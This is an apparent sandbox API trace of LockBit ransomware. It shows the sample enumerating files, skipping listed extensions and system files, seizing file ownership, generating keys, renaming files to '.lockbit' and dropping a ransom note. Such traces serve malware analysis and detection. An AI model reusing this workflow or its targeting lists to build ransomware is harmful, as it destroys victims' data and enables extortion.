0x753f0000 [0076.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0076.954] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0076.961] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\Common.fxh.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.962] malloc (_Size=0x80) returned 0x77de70 [0076.962] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6c2dc, FileInformation=0x77de70, Length=0x80, FileInformationClass=0xa) returned 0x0 [0076.962] free (_Block=0x77de70) [0076.962] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\Common.fxh" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared") returned 1 [0076.962] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\Restore-My-Files.txt") returned 55 [0076.963] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0076.963] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.963] malloc (_Size=0x40068) returned 0x1ff1e60 [0076.963] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0076.964] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d12cc5, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93d12cc5, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x6895ae5b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6d1f, dwReserved0=0x523728, dwReserved1=0x0, cFileName="DissolveAnother.png", cAlternateFileName="")) returned 1 [0076.964] lstrcmpiW (lpString1=".", lpString2="DissolveAnother.png") returned -1 [0076.964] lstrcmpiW (lpString1="..", lpString2="DissolveAnother.png") returned -1 [0076.965] PathFindExtensionW (pszPath="DissolveAnother.png") returned=".png" [0076.965] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0076.965] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0076.965] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0076.965] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0076.965] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0076.966] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0076.966] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0076.966] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0076.966] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0076.966] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0076.966] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0076.966] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0076.966] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0076.966] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DissolveAnother.png") returned 1 [0076.966] lstrcmpiW (lpString1="ntldr", lpString2="DissolveAnother.png") returned 1 [0076.966] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DissolveAnother.png") returned 1 [0076.966] lstrcmpiW (lpString1="bootsect.bak", lpString2="DissolveAnother.png") returned -1 [0076.966] lstrcmpiW (lpString1="autorun.inf", lpString2="DissolveAnother.png") returned -1 [0076.966] lstrcmpiW (lpString1="thumbs.db", lpString2="DissolveAnother.png") returned 1 [0076.966] lstrcmpiW (lpString1="iconcache.db", lpString2="DissolveAnother.png") returned 1 [0076.966] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\") returned="" [0076.967] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned=".png" [0076.967] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0076.967] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0076.967] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0076.967] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0076.967] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0076.967] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0076.967] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0076.967] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0076.967] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0076.967] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0076.967] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0076.968] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png.lockbit") returned 62 [0076.968] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.975] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.976] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.976] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.976] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.976] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.976] RtlFreeAnsiString (AnsiString="\\") [0076.976] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6c530 | out: TokenHandle=0x3d6c530*=0x3a0) returned 0x0 [0076.976] malloc (_Size=0x200) returned 0x77d800 [0076.977] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6c528 | out: TokenInformation=0x77d800, ReturnLength=0x3d6c528) returned 0x0 [0076.977] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6c2e4, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.977] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6c2e4, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.977] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.977] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.977] CloseHandle (hObject=0x3a0) returned 1 [0076.977] free (_Block=0x77d800) [0076.977] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0076.977] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.978] malloc (_Size=0x40068) returned 0x1ff1e60 [0076.978] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=27935) returned 1 [0076.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.978] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0076.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0076.979] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0076.982] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.982] malloc (_Size=0x92) returned 0x77d800 [0076.982] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6c2dc, FileInformation=0x77d800, Length=0x92, FileInformationClass=0xa) returned 0x0 [0076.982] free (_Block=0x77d800) [0076.982] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared") returned 1 [0076.982] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\Restore-My-Files.txt") returned 55 [0076.983] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.983] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d38e22, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93d38e22, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x68980fb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb7835, dwReserved0=0x523728, dwReserved1=0x0, cFileName="DissolveNoise.png", cAlternateFileName="")) returned 1 [0076.983] lstrcmpiW (lpString1=".", lpString2="DissolveNoise.png") returned -1 [0076.983] lstrcmpiW (lpString1="..", lpString2="DissolveNoise.png") returned -1 [0076.983] PathFindExtensionW (pszPath="DissolveNoise.png") returned=".png" [0076.983] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0076.983] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0076.983] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0076.984] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0076.984] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0076.984] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0076.984] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0076.984] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0076.984] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0076.984] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0076.984] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0076.984] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0076.984] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0076.985] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DissolveNoise.png") returned 1 [0076.985] lstrcmpiW (lpString1="ntldr", lpString2="DissolveNoise.png") returned 1 [0076.985] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DissolveNoise.png") returned 1 [0076.985] lstrcmpiW (lpString1="bootsect.bak", lpString2="DissolveNoise.png") returned -1 [0076.985] lstrcmpiW (lpString1="autorun.inf", lpString2="DissolveNoise.png") returned -1 [0076.985] lstrcmpiW (lpString1="thumbs.db", lpString2="DissolveNoise.png") returned 1 [0076.985] lstrcmpiW (lpString1="iconcache.db", lpString2="DissolveNoise.png") returned 1 [0076.985] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\") returned="" [0076.985] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned=".png" [0076.985] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0076.985] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0076.985] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0076.985] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0076.986] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0076.986] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0076.986] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0076.986] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0076.986] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0076.986] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0076.986] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0076.986] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0076.986] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0076.986] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0076.986] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0076.986] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png.lockbit") returned 60 [0076.986] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.987] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.987] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.987] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.987] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.987] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.987] RtlFreeAnsiString (AnsiString="\\") [0076.987] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6c530 | out: TokenHandle=0x3d6c530*=0x3ac) returned 0x0 [0076.987] malloc (_Size=0x200) returned 0x77d800 [0076.987] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6c528 | out: TokenInformation=0x77d800, ReturnLength=0x3d6c528) returned 0x0 [0076.987] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6c2e4, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.988] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6c2e4, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.988] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.988] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6c2e4) returned 1 [0076.988] CloseHandle (hObject=0x3ac) returned 1 [0076.988] free (_Block=0x77d800) [0076.989] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0076.989] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.989] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.989] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=751669) returned 1 [0076.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0076.990] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0076.990] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0077.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0077.003] malloc (_Size=0x8e) returned 0x77d800 [0077.003] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6c2dc, FileInformation=0x77d800, Length=0x8e, FileInformationClass=0xa) returned 0x0 [0077.004] free (_Block=0x77d800) [0077.004] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared") returned 1 [0077.004] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\Restore-My-Files.txt") returned 55 [0077.004] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.004] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x523728, dwReserved1=0x0, cFileName="DvdStyles", cAlternateFileName="DVDSTY~1")) returned 1 